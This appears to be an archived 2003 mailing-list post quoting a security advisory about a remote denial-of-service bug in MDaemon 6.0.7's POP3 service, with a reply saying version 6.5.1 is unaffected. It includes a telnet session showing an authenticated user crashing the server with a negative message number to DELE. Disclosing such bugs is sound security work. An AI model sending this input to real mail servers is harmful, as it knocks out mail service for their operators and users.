Tested on 6.5.1 on Win2K Server. Does not crash MDaemon and returns a 'no such message' error. Sincerely, William Pratt Unix Systems Engineer MegaPath Networks, Inc. http://www.megapath.net ########################################################* # Damage Hacking Group security advisory # www.dhgroup.org ########################################################* #Product: MDaemon SMTP/POP/IMAP server =>v.6.0.7 #Authors: Alt-N Technologies [www.mdaemon.com] #Vulnerability: remote DoS via POP3 service ########################################################* #Overview#-----------------------------------------------------# - From help-file: "MDaemon Server v6 brings SMTP/POP/IMAP and MIME mail services commonplace on UNIX hosts and the Internet to Windows based servers and microcomputers. MDaemon is designed to manage the email needs of any number of individual users and comes complete with a powerful set of integrated tools for managing mail accounts and message formats. MDaemon offers a scalable SMTP, POP3, and IMAP4 mail server complete with LDAP support, an integrated browser-based email client, content filtering, spam blockers, extensive security features, and more." #Problem#------------------------------------------------------# >telnet 127.0.0.1 110 +OK dark POP MDaemon ready using UNREGISTERED SOFTWARE 6.0.7 <MDAEMON-F200303080 224.AA2418601MD5635@dark> user dark +OK dark... Recipient ok pass ****** +OK dark@dark's mailbox has 13 total messages (2274775 octets). dele -1 Connection to host lost. ...and MDaemon is crashed. This bug (with negative digits) is founded in UIDL and DELE commands and it could be used by authorized users only.
This archive was generated by hypermail 2b30 : Mon Apr 28 2003 - 15:41:23 PDT